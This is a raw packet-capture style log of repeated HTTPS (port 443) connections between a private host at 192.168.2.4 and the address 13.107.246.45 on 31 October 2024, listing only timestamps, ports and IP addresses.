                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131644964 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.131654978 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195215940 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195244074 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195291996 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195333958 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195363998 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195610046 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195610046 CET51435443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195631027 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.195640087 CET4435143513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.198690891 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.198728085 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.198841095 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.198977947 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.198991060 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.222888947 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.222981930 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.223052979 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.223298073 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.223298073 CET51436443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.223320961 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.223330975 CET4435143613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.226444006 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.226475954 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.226562977 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.226747036 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.226763010 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.861443043 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.862122059 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.862138987 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.862654924 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.862660885 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.866543055 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.866847992 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.866863012 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.867160082 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.867166996 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.875221014 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.875526905 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.875538111 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.875885963 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.875893116 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.965383053 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.965944052 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.965959072 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.966464043 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.966470003 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.974652052 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.975100994 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.975116014 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.975519896 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.975526094 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.989586115 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.989670992 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.989742041 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.989756107 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.989800930 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.989857912 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.990017891 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.990046024 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.990056992 CET51438443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.990062952 CET4435143813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.993171930 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.993215084 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.993325949 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.993556976 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.993570089 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998085022 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998109102 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998172998 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998173952 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998235941 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998348951 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998348951 CET51437443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998366117 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:37.998377085 CET4435143713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.001008034 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.001036882 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.001113892 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.001271009 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.001286030 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.010149956 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.010384083 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.010474920 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.010474920 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.010500908 CET51439443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.010515928 CET4435143913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.013133049 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.013163090 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.013237000 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.013422966 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.013437986 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.101731062 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.101753950 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.101919889 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.101936102 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.102209091 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.102219105 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.102236986 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.102385044 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.102417946 CET4435144013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.102524996 CET51440443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.105588913 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.105640888 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.106537104 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.106537104 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.106580973 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.126576900 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.126609087 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.126662016 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.126693964 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.126744032 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.127022982 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.127037048 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.127048016 CET51441443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.127054930 CET4435144113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.129961967 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.130000114 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.130105019 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.130245924 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.130273104 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.747735977 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.748274088 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.748287916 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.748743057 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.748749971 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.753340960 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.753999949 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.754021883 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.755999088 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.756016016 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.772414923 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.772860050 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.772881031 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.773375034 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.773382902 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.857285976 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.857873917 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.857887030 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.858392000 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.858397961 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.862644911 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.863198042 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.863212109 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.863466978 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.863471985 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.877796888 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.877876043 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.877938986 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.878163099 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.878176928 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.878187895 CET51442443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.878194094 CET4435144213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.881202936 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.881242990 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.881329060 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.881491899 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.881509066 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.885212898 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.886023998 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.886092901 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.886133909 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.886145115 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.886158943 CET51444443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.886163950 CET4435144413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.888279915 CET51448443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.888319969 CET4435144813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.888394117 CET51448443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.888515949 CET51448443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.888530970 CET4435144813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915359974 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915390015 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915433884 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915517092 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915555954 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915638924 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915657043 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915668011 CET51443443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.915674925 CET4435144313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.918020010 CET51449443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.918059111 CET4435144913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.918133974 CET51449443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.918318033 CET51449443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.918334007 CET4435144913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988398075 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988430023 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988482952 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988545895 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988586903 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988859892 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988877058 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988888025 CET51445443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.988894939 CET4435144513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.991817951 CET51450443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.991841078 CET4435145013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.991923094 CET51450443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.992078066 CET51450443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.992098093 CET4435145013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.993304014 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.993366003 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.993482113 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.993560076 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.993560076 CET51446443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.993571997 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.993581057 CET4435144613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.995661020 CET51451443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.995677948 CET4435145113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.995755911 CET51451443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.995874882 CET51451443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:38.995887041 CET4435145113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.631052017 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.635942936 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.635963917 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.643461943 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.643467903 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.667335987 CET4435144913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.679409981 CET4435144813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.721961975 CET51449443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.721961975 CET51448443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.741334915 CET4435145013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.741946936 CET4435145113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.754494905 CET51449443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.754513025 CET4435144913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.754975080 CET51449443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.754981995 CET4435144913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.755202055 CET51448443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.755213022 CET4435144813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.755567074 CET51448443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.755572081 CET4435144813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.756684065 CET51450443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.756699085 CET4435145013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.757070065 CET51450443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.757075071 CET4435145013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.757287025 CET51451443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.757301092 CET4435145113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.757651091 CET51451443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.757659912 CET4435145113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.768522978 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.768718958 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.768769979 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.768852949 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.769081116 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.769081116 CET51447443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.769098997 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.769114971 CET4435144713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.772010088 CET51452443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.772051096 CET4435145213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.772166967 CET51452443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.772304058 CET51452443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:39.772315979 CET4435145213.107.246.45192.168.2.4
